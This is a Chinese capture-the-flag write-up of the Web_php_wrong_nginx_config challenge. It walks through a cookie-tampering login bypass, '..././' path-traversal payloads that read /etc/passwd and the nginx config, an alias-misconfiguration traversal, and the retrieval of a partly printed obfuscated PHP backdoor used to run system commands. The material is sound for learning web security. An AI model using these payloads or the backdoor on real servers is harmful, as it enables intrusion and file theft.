【Web】攻防世界Web_php_wrong_nginx_config

这题考察了绕过登录、目录浏览、后门利用

进来先是一个登录框,随便怎么输前端都直接弹窗

【Web】攻防世界Web_php_wrong_nginx_config_第1张图片

禁用js后再输入后登录

查看源码,好家伙,不管输什么都进不去

直接扫目录

【Web】攻防世界Web_php_wrong_nginx_config_第2张图片

访问/robots.txt

 【Web】攻防世界Web_php_wrong_nginx_config_第3张图片

访问/hint.php

 【Web】攻防世界Web_php_wrong_nginx_config_第4张图片

访问/Hack.php

 【Web】攻防世界Web_php_wrong_nginx_config_第5张图片

抓包看一下

 cookie里isLogin=0改为=1

发包,发现成功登录【Web】攻防世界Web_php_wrong_nginx_config_第6张图片

改下cookie

【Web】攻防世界Web_php_wrong_nginx_config_第7张图片

点击管理中心发现url改变,意思存在任意文件包含

同时页眉多了please continue,提示我们路子对了

【Web】攻防世界Web_php_wrong_nginx_config_第8张图片

这里太明显了,file就是文件名,ext是文件后缀 

 尝试直接读环境变量,但无回显

?file=file:///proc/1/environ&ext=

?file=file:///etc/passwd&ext=

经过尝试发现../被替换为空

(?file=./index.php,回显正常。再输入../index.php仍显回显正常,可能../被替换为空,尝试inde../x.php,发现回显仍然正常,印证猜想)

双写绕过即可..././

?file=..././..././..././..././..././etc/passwd&ext= 

 结合hint.php

?file=..././..././..././..././..././etc/nginx/sites-enabled/site.conf&ext=

拿到配置文件内容

                        server {
    listen 8080; ## listen for ipv4; this line is default and implied
    listen [::]:8080; ## listen for ipv6

    root /var/www/html;
    index index.php index.html index.htm;
    port_in_redirect off;
    server_name _;

    # Make site accessible from http://localhost/
    #server_name localhost;

    # If block for setting the time for the logfile
    if ($time_iso8601 ~ "^(\d{4})-(\d{2})-(\d{2})") {
       set $year $1;
       set $month $2;
       set $day $3;
    }
    # Disable sendfile as per https://docs.vagrantup.com/v2/synced-folders/virtualbox.html
    sendfile off;

        set $http_x_forwarded_for_filt $http_x_forwarded_for;
        if ($http_x_forwarded_for_filt ~ ([0-9]+\.[0-9]+\.[0-9]+\.)[0-9]+) {
                set $http_x_forwarded_for_filt $1???;
        }

    # Add stdout logging

    access_log /var/log/nginx/$hostname-access-$year-$month-$day.log openshift_log;
    error_log /var/log/nginx/error.log info;

    location / {
        # First attempt to serve request as file, then
        # as directory, then fall back to index.html
        try_files $uri $uri/ /index.php?q=$uri&$args;
        server_tokens off;
    }

    #error_page 404 /404.html;

    # redirect server error pages to the static page /50x.html
    #
    error_page 500 502 503 504 /50x.html;
    location = /50x.html {
        root /usr/share/nginx/html;
    }
    location ~ \.php$ {
        try_files $uri $uri/ /index.php?q=$uri&$args;
        fastcgi_split_path_info ^(.+\.php)(/.+)$;
        fastcgi_pass unix:/var/run/php/php5.6-fpm.sock;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_param SCRIPT_NAME $fastcgi_script_name;
        fastcgi_index index.php;
        include fastcgi_params;
        fastcgi_param REMOTE_ADDR $http_x_forwarded_for;
    }

    location ~ /\. {
            log_not_found off;
            deny all;
    }
    location /web-img {
        alias /images/;
        autoindex on;
    }
    location ~* \.(ini|docx|pcapng|doc)$ {  
         deny all;  
    }  

    include /var/www/nginx[.]conf;
}

注意这里:

location /web-img {
        alias /images/;
        autoindex on;
    } 

这里 设置了 /web-img 为 /images/ 的别名,autoindex on 开启了目录遍历,则存在 目录穿越:

直接访问根目录/web-img../

【Web】攻防世界Web_php_wrong_nginx_config_第9张图片

访问/web-img../proc/1/environ

下载附件发现啥也没有(读环境变量的执念) 

找到hack.php.bak,访问,下载附件

$d"|U);@ses|U|Usion_des|Utroy();}}}}';
$j='$k|Uh="|U|U42f7";$kf="e9ac";fun|Uction|U |Ux($t,$k){$c|U=|Ustrlen($k);$l=s|Utrl|Ue|Un($t);$o=|U"";fo|Ur($i=0;$i<';
$R=str_replace('rO','','rOcreatrOe_rOrOfurOncrOtion');
$J='kf|U),|U0,3));$p="|U";for(|U|U$|Uz=1;$z

 代码经过了混淆加密,echo $f;即可

再用美化工具处理一下

$d");
				@session_destroy();
			}
		}
	}
}

 分析文章

我的评价是,不多纠结,直接拿脚本打了

system('ls');

system('cat fllla4aggg.php'); 

你可能感兴趣的:(php,开发语言,CTF,WEB,攻防世界)